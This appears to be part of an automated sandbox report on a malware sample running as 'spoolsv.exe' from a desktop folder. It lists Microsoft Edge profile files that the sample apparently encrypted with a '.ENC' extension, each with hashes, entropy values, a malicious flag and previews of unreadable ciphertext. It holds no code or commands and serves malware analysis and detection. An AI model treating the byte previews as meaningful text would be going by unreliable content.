                                                                                                                                                                                                                                                      Preview:....y..O..4..l2*.F8.#^=..g.0...M....l.`...]:z.......f.qD6.....*........`..r..J.....s..i......K.m......c.Q.h.c.y.0%J...E.0....S(hbS.V...?..8i.2......?.}....k...|.*+0....rM.J(h.F...(.h.m_.jM.e..YC7.|...c%.UB..*R..r...t...rw...............n\K....[..oX....-.<.O....Nz..j..7..-L..d.:.....L;F....7..\2v.D.[kr.F...qpO..(r.+|T-....c\.....E<.eFzA.}(.<3.S../.t...l*......v.:....poeH..".+.~.L....P.....D :.....=...k..uh=..H.C7...d....Z..5..Q.;;J.8..d7..=...98....u!......*.`bH.7.6.V.|ZV.!e....eHz.v..)...).....,....Bt...,......EK@...2..E./.....z....\.B.......t.b6.0c...f...5..`D3].AW..G.7.|g.......`v...)J!-*5s...4c...G.....)..[..tA.W..k.c*.J-y?..#D......h..K.BH.....l9.'..J.U.Gy.1.%G8.Rj....H..rlJwC `R`b.2 .l..n.".g.l.p.3.Af....7.}4..L ...\....a...E.1.....#..T.z .._....%.C......~;_....`...H........f..O..._.a...w.*.>..."..>i.X.u0!.b..@.U.....O*.!..i._..0..TA..vP......Z........F.........?....../.....?..dK.B...o#..TT..7...;Z...=w......`..n.....~....Y..<...H.i.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8\manifest.fingerprint.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):80
                                                                                                                                                                                                                                                      Entropy (8bit):6.121928094887357
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:l+DMTnfz5rytMs63d6JOyn:IDMb1yGlMJOy
                                                                                                                                                                                                                                                      MD5:4834DA85E68B9C8FE094875A26D075FB
                                                                                                                                                                                                                                                      SHA1:BFB790DC13C9BE5BE79E7D82A9789D453C67F037
                                                                                                                                                                                                                                                      SHA-256:2081161640A6B88E2B52C1E3CCED4D4C9A93BBCE1228900F9C1DA543507A996F
                                                                                                                                                                                                                                                      SHA-512:B09D942AD369DD03FEECE56CE57D0369A4D53852A5E3EE767AB8D1355A968873946EEA5CA92CE5A0EF1CFFA15C1816D9F15CB65CA43F6772EE28454F8BAE8568
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....}2...J.).rT.]......zt^3.(R.B:..N..}h5..Ii]....I@...L.T.l.VK.~?.~...D..&fK

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8\regex_patterns.json.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):208
                                                                                                                                                                                                                                                      Entropy (8bit):6.9905900042384665
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:niusGibLnZmBPoxwnk61n3Df4cqvvdhL6abhn:ncPHnMuUk8n3UvLLb
                                                                                                                                                                                                                                                      MD5:E2B0CB794077C1A0C2157639FAEB69AC
                                                                                                                                                                                                                                                      SHA1:46228E08A5EDA3C80D4C02A7F154F4AED7F3A8C4
                                                                                                                                                                                                                                                      SHA-256:D2E7A745C2907117C953F841C356C48B27AE35EFA9A9241467823C4E65900548
                                                                                                                                                                                                                                                      SHA-512:CBB64FB915BC712BA3E5572C027B72FDAEC5685564B8810392A8BB615E344ED40E6A7C58AB5382A13AE2B9E368D67C4C4DAD8C789C733F6FA5641548F0FA3EF4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.....'.}...TjVH...?..J..U.J.M" Ma.+.....,..C.Z.|\v[{)...&..Ip.c..7..>H.]..!:..,.~.}y...L..fB.e.cHE..l..M..)..y..0...iC..Z..:...7.c..u`z.Z.Z..SJ....<....f....M..50.......Hv.......Yw.(eb|.e..k.^.6.vH

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8\v1FieldTypes.json.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):519824
                                                                                                                                                                                                                                                      Entropy (8bit):7.99968051600712
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:12288:/PZYhTSmA/5u/4BWqIGZyc/Ruzo4274K9V5mD8JA/n:5kTNA/AgBNpOgRs8JAP
                                                                                                                                                                                                                                                      MD5:A217889F40C710BBCBA79706DB104D00
                                                                                                                                                                                                                                                      SHA1:DA2188179CD8AE6D17B69DC5C4F489A64DECB8A1
                                                                                                                                                                                                                                                      SHA-256:7D8E86ED3905A9D592E287A764EBC2F870744F98C1B758F1F0B46D5F2ACCBA55
                                                                                                                                                                                                                                                      SHA-512:8E878E711B679739B4A3B25B934E32CBE8FFBF9DC0E54953616A936957ABBDBBC8969A76A5EB3B2111C5BAA04834E0D2915FDB12146247E1168786CD8056D6E0
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:..R..'...P......y..e..2*..=F.E.J`.K..uh.o..c...1....................|s.Nx.(..O.....S-..o........D|.N}.+..S.x...*#LT..`/.oj.Ge(.....9E..,..F....9....K...x.-..~.Cj....r|m...AH.\.&..%m.....P0.&.se..C..... iL.IQ^_b..;N.O.."=...U..|.M..-.8...,..gfu.4...w.%..<....>Y.&..pl.IV....%...(...3BP......Z.mP.zl.OS.M{.|..V._Uw...w.......K.c..Q.T.y...r...4..W.,......n.....)+...%..l.y...E....%T.....!.D.j...z.^.....m...?[s........,4R..T...!.[Q.y.42.[...."D.~=....~.Vkx'].1r..i.t;I..L3%J4..N.f........n.."T.6[..d0.....nq...!.p...g.,{?....i1.X^\..a.......?_J..$).R.....m;...@.m.......p.....7..C.-....38c..J.B.7EiE....?jb......FN..t..v3.E.V.L+"..u[....h...wq4.jF....N......EW...N}.X+q.....p@.]a{.x.A...rVN...G..u.......Q%..u.$....BcN..D.2..<\.r......F..T.G..........M..8....Se.F"P.?..t.w.uA.L'.R........`.....X.y...........WzL3y.(q.../.v\...\.&......dEn...4.I.YY.*.*@.hF.~.d{|.b..~..BJ..i....6o. 2V...=.j..0..8.E..@K..E\.....)...4C@c......\.f6..C-.xaz.BG...C......F..B3

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2023.8.1\crl-set.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):22480
                                                                                                                                                                                                                                                      Entropy (8bit):7.992705486233133
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:384:b7AjBbUqwwvnJx2BuHipMfklIXnfvfILmyy/rUYNcxvklwyOsIroP0jWvUQ:3AjRUqwyx2MiafkQfYLm1N+kXIrA0jWL
                                                                                                                                                                                                                                                      MD5:5565A5C0E16C563D469B2B04F8A7B4BE
                                                                                                                                                                                                                                                      SHA1:E9AB715034BEE9BBBD856489ACF30B95A1E1EC5C
                                                                                                                                                                                                                                                      SHA-256:73AAC318D4467B5CFB91AF52F3A49B69B399D67EE39FFA16202A9B40C3457365
                                                                                                                                                                                                                                                      SHA-512:6C4E67E3ADCB1343083ECB555AB1F4BC992718E1AF669769869C24DAFA90E8023F83DCF9AA15361190C71F473149B301A22DE375A83440CFB79729D4D050101A
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:ns.r.6....=&B...,.G...u2.....N3..c.].7.8%....(3..K..F...Mo.$....XR...bg.sw.d.hIap......}.K.Y..O.'l......0J..#\.@.....E@]....Y'....K..?...nO..0LrW...I..# .m.M.O.!.nX.1..j...d&zv...'..<...`......b.ZD..~....6..i..........._.F....H.......QMl..0.c..Nu...k..fT.2mZ$wZ....Iv..Lkw....k..$0...Kl.3.{..h.y.hu..y]Rs=.J...v..;TPx..5;..h.....B.:/..J...#.zu..s......9...+.|.;..]......z.[.....K+c.8)\gZ...@.y......s..3xd7.7".P5..:.I.. ...v.I..d1...[...$0.K.....`.1..k...E.=...xI..4.%Gq..2"..@...q...^@..SQNl..w..v...n..._[....ED...-.&...r.=zu#@0..w.0.......6.F....xMO.1s.....V.1......i...vd..uj.9..8r...=.w.....zK...c.(...e.&[s....... ....Bf\.pXdIJ..cL...B.0...x[)H...p.... .'.hoh.....X...L.%76....+.....#ck...?.....g.#c......O.6_.~x..w......+x...<F..8R.J.c..Q.\.2(?j.....V..oz.h...'..1."..T.... !=............o.x...|Q...r:i!h@fPE.....d.E6$..bE?.....h.H..#K..T..#..w7\..=.}.k.P.,...F\.q.}4..J.y...3.%...-.....>..1.U.,[......>F.u..9..0T.....6 ....<O...pXY..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ExtensionActivityComp-journal.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOCK.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):368
                                                                                                                                                                                                                                                      Entropy (8bit):7.406141075671917
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:gxlX0V/cL5vhQdir5+YHjr1eFi0opn/LVaAUIn+/HMC3fO/piNb:elicL5pQ6LD5j08n/WE2k/pip
                                                                                                                                                                                                                                                      MD5:C79A126D42DD58CE3A5ED0D7DEBB6317
                                                                                                                                                                                                                                                      SHA1:9DD2196C14B04385453151F97544186E4FAB5204
                                                                                                                                                                                                                                                      SHA-256:643465008C5BB2B7B101079005703B11E3C81DB1E67D3A227F9B064ABF8E51C1
                                                                                                                                                                                                                                                      SHA-512:288EF9F32EA70D8948C84F0D532CBD90B65B89F563356CD5FA04B0B1A15FA6BAF7B4E5AE88F6A44AC53BC6A70F81DC121586C5DC494032C31C43729BD8E20D97
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.B....S.R4..a....#.A..[A..u.R.Z..'......e<..(\+[.{..".x...".>.....Vc.).NR?...K..CIg..Y".m.+Oj........@..... Pw..".q.w...M5w....E........:.$...<..z.f,.....r...5.BAN.cwybyt.tA.@x.T...9.L....f...E/..Oe0XF.KG./....3.......r...!.X.G.s.....'..;.2....G..f..iSS....@...M....n......K6.:..Hh.fx..._.....P...o.a.L...6...g).gE....h.X...a..N?*.3.S.......?...>eL...L.F4.Z3

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\000003.log.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):48
                                                                                                                                                                                                                                                      Entropy (8bit):5.376629167387827
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:K2Lvijdp0hZqGBn:K2L20hZqGB
                                                                                                                                                                                                                                                      MD5:3899544D5CB25AF5EE222C1B9E599442
                                                                                                                                                                                                                                                      SHA1:3D96E397F4752781B5F9B7B760C2719DE0AFB2B4
                                                                                                                                                                                                                                                      SHA-256:9716E66FB41CF78D7B73E67F02F3B41D747A919E4301D5BE5998FE55222CE2A6
                                                                                                                                                                                                                                                      SHA-512:22E139C6EC05892683AD9A4AB3E4AF8973C80543716D059753A6250812B5892002DF73AF315F6DB79B7CE68B28BCDCEF32E50B68C348BC59BA69C1DDB4D2A218
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...F..SQa.r..O.a..$0.f.9....l$...%.TO.....M

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\CURRENT.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                                                      Entropy (8bit):4.9375
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:QRzgTczBv:Q5d
                                                                                                                                                                                                                                                      MD5:328FC1F4C693CE30D6A0FB47D34D59E3
                                                                                                                                                                                                                                                      SHA1:A49BAAFDEFA3CE958AA56709FF598FBA601A8798
                                                                                                                                                                                                                                                      SHA-256:F6F0E310BCA7FD98AA03FE19DDCBB88434AFBBBC51A64774405F82DD457CBA2B
                                                                                                                                                                                                                                                      SHA-512:B1CF96413C6D8BEB6D3A6D26CCA9068DF4B7EAD78D4C0E7454AC7D4B938BA49311B060A6C7B8277C7A8A667C6A9A674C0063EA05EAA2F205F110ADB9534A28BC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...Y.4.t*..V.h=.#..x..k..Y.$.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):336
                                                                                                                                                                                                                                                      Entropy (8bit):7.360514669557914
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:mqwDgOwzPMcBruJiaCMAA0mC3KNlCwWDAii1PqR5Vrd2H61NnzZpFC:UgPrnrNmnC3UlEEiWP+zVTZfC
                                                                                                                                                                                                                                                      MD5:F4C4687F646A2EF7B7223543A5F7E728
                                                                                                                                                                                                                                                      SHA1:22088A7D1E474E0C967FB105D25738BFE24B6132
                                                                                                                                                                                                                                                      SHA-256:B34E33A9D6B11A4E041E14ACEF1166F63E241EBFEE6F3376DBCB06EC399DFEBE
                                                                                                                                                                                                                                                      SHA-512:A985A3CEC88149C544976B1FBDB4A57C6726B6F42E31E96AB191B641EE687D39F130D4A8183DCB1E27A75DE86E7F9529C6BB8000AB3146C5B8D602F86EA86894
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<....|......}.i8.<.3...o.#|.I.......)D.._eQ.!.o.vQ.v.....38.W<..!..F...b..qQ.......aq...*.+...>W...(f..f.X..F(..b.j'.../ ...G.Lu.Iw..e.....M...,S.%...oS..xBF..r...c.!...u.N:.Ab.Z:[.:|)J.v.<..=.T=1..z/B.]......@....h..._WA...$.......B..s....*.!i...........c~=.K..!).h.,..~....._...,f....Y...{.J..!x.8...O.0....g. &...4.s2.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\MANIFEST-000001.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):48
                                                                                                                                                                                                                                                      Entropy (8bit):5.543295834054493
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:qb0z5ZjCY:+aH
                                                                                                                                                                                                                                                      MD5:00B5963CADCB5E972047846E44EE2632
                                                                                                                                                                                                                                                      SHA1:3741D074C652E62798A616ED56C811482AF90C65
                                                                                                                                                                                                                                                      SHA-256:AD5D4ADA9FA65FCFCC5B74692628D26993377029E512DC6FC103A8819650AD66
                                                                                                                                                                                                                                                      SHA-512:ACC0812854372F9CE7AE2854D5EDB6D4B02D820E275524CEDA2329495CCE7D0CB3E8455A426E67BBBAA8CA2F5C1701D68FF1444DD0318EEE647717EC264B308E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...P...`&)....Y..R.r...........yT.?.......

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):11760
                                                                                                                                                                                                                                                      Entropy (8bit):7.985843600910965
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:fxNNyovkr1g2heKFf6czi6fbozTE1iNUBiXkTHPoPYBpRx0D5:fxDJvkBgXKFf6dSUHE1KUZTT7MD5
                                                                                                                                                                                                                                                      MD5:0050072577B22F72E9C73986BCA4B4D3
                                                                                                                                                                                                                                                      SHA1:BB04B52E77518DDEA021219E254DBCBF7732941B
                                                                                                                                                                                                                                                      SHA-256:511408472914A2A7F9F7E33BFD26BF8C892B1C92FFA11D469B1B52BF9CFE6E19
                                                                                                                                                                                                                                                      SHA-512:30CD42B1B00C452BA6283225209BB7A737C7E2134720C9D3FF3CCC7EE5B9E01D2DF32C73E60FB11C6F1BFAFBD838A7825B4B437EAC9411B68F84EB55F175DA8C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:z.C9;+L..M.....~$.&...0 .....sX.....+Z.u....Zy.NOjXO.A....y.|.z....|...t...y.&.o.mb..[........UJ...yWy.+.v....g?'.@.....2......Q$....W/..D...R....V.sB..N|...=DK.9...o.....m...k[<...Dd.wy.\..L...)..9..I...........o;>~...z..nu..J...s.s..H-r.aJ.~=..yv......-.8u.J.r#..ydk.3 ..n...(......k.IpC~...`...)w.'.........W.f..x...oigm'{..d.um........+.]..;.2.......C.B&../@.p.7..L.....{...T_.I)...}j#}.w........h);.q...o.t..H.O.....q..qp.m5.y,+.b.h...!k5.o..e...d..K.a...3.Nb.r...X.$...!x'.......O. f.X(.....8._*J...z....C.\..x./]..M.....O...8.u..^.C.Y/.....y+....)..f.........M...iS.S..U8..B.0.|P.........\.tBu.4.%...^...........&........G..y.K...;.-.....)+.u.......I.w."......m.>...0.:.vU..c.6;.....KD.J...c..i55....N....Ht.].Nh...x.4.E.py..' &....q...*k..#...aaF.=.e...H.|......<...SJ.q...~4..{.... ....\..j...7..Rt..i0lK.p..p.r]*.kch.@.x.\0..9..c.>.5.a....n...O..na..5..P.fl..0.3......=&=#.....[.]......J}...!u.V.............5.q.Z..^...O.z.R..$.;......**U&^.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                                                      Entropy (8bit):4.9375
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:QRzgTczBv:Q5d
                                                                                                                                                                                                                                                      MD5:328FC1F4C693CE30D6A0FB47D34D59E3
                                                                                                                                                                                                                                                      SHA1:A49BAAFDEFA3CE958AA56709FF598FBA601A8798
                                                                                                                                                                                                                                                      SHA-256:F6F0E310BCA7FD98AA03FE19DDCBB88434AFBBBC51A64774405F82DD457CBA2B
                                                                                                                                                                                                                                                      SHA-512:B1CF96413C6D8BEB6D3A6D26CCA9068DF4B7EAD78D4C0E7454AC7D4B938BA49311B060A6C7B8277C7A8A667C6A9A674C0063EA05EAA2F205F110ADB9534A28BC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...Y.4.t*..V.h=.#..x..k..Y.$.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOCK.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):352
                                                                                                                                                                                                                                                      Entropy (8bit):7.38212797096194
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:gxlqzErRIk0RYnqZRnDWx7UHr3IDUVkaw0hnevJQnybKIVoJnScd9Xjyj4slP:elqArO/+qyxQTIDKkBRI+KOkScryZP
                                                                                                                                                                                                                                                      MD5:ADB3B2ACC17519A26C85554ED8555592
                                                                                                                                                                                                                                                      SHA1:053C0D5115ED237480668FA980F8DD76C0A1EB99
                                                                                                                                                                                                                                                      SHA-256:1D12D5491349786D3DBEAF82B3BCC6753B37753728E93ECF3F33BC4BD3F0EE7A
                                                                                                                                                                                                                                                      SHA-512:EF0C5733D897B2838BF2C5EB92B57E7D4E570997F2FB376F8B57C3943E568963AD738F0ABD3C0F1470CF350B232A72705F6E8644B2D4FD98DE0D7105C821078F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.B....S.R4..a.......>,.k....f.i`.1..'.....thTk.x..C.+.--M..U.A.T.d:..o......./>..k...*...S..@..7.4..&....t..xg....^.....`...3._?%|l.N.7:x...|....Y:.....]j..M....D..lD.HH..E.GgZw.. ...5;.pg..A...-.......E......`..l_..U...$...5B8.po.9Z..+.-.T.+.*....x..'..B0P9....4-y..C...:...A./B...F..X.4....M.^v....9....pl.........3x...w<.....O.9"....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):352
                                                                                                                                                                                                                                                      Entropy (8bit):7.3520962408683435
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:mqwqLuli08O+ORxp3lzxsbQtzAx6qud75N/TAAFQNJJ8sjCox0075T4PDHIN:Vul6Ri3z6stMQVd7//kTVOBjLHIN
                                                                                                                                                                                                                                                      MD5:A89363D64A2BABCEDAA4197713969987
                                                                                                                                                                                                                                                      SHA1:302AECFDD40BC4C18F9EFE37F95D3E1391063CFF
                                                                                                                                                                                                                                                      SHA-256:D842C537E3B81461AB154E0D429DAA271E9E06779D15EDF4687CADEBE66670C3
                                                                                                                                                                                                                                                      SHA-512:F1C0D2653928ADCA117DAFA68CFB2E0A9C41B2F134C10E48924C3538CCC0B138E74BAC9C205780645F1E9DB1732C669818FF3A29348429FEFBC7BB3532722924
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<....|......}..............{..A0.....X.&../....jH...........).*.......}.T......B.\...n.9.q......b......c..H.......zr.w..i.F..F.5.SH........M{..=9..}.KQ..+..bq;z....Q..!.gI..K5s..om:1j..9...N{...d...0....6e..T.].CZ'&....O.w"...}.. p.......T. .Z.6....<.a.<#.:.F...Pw...?k....`ah.f......S@]...:.}4..W......G....2..J2..ih..d...<....gD.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\data.txt.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):80208
                                                                                                                                                                                                                                                      Entropy (8bit):7.997886290778441
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:1536:C8B0smNMi13Fe56aL6juPQ+YUs9YzASFTay270F8niEGQ+TW8cE:fSFO+aL6jR+YLazxFTQ9iEGQ+T8E
                                                                                                                                                                                                                                                      MD5:190D948FD5B113EE3EDA3F5CA3CB3F80
                                                                                                                                                                                                                                                      SHA1:FA5CB9993FA57E6CB52A9ADB27EE8B675E0576F9
                                                                                                                                                                                                                                                      SHA-256:6D3E657C0BFE3C74E2EFD20B458DFC8AEF031F9FC66FDFAEA12A9CD4FFD70619
                                                                                                                                                                                                                                                      SHA-512:62755982856FA8915FE23C0A987405B305282A4E8A6768BC8F981E7CA309BBD4E2C03627B86B79B1B6C4B083B4D3E11C201EE46121A02BDBFF4756D5EF7FE95F
                                                                                                                                                                                                                                                      Malicious:true
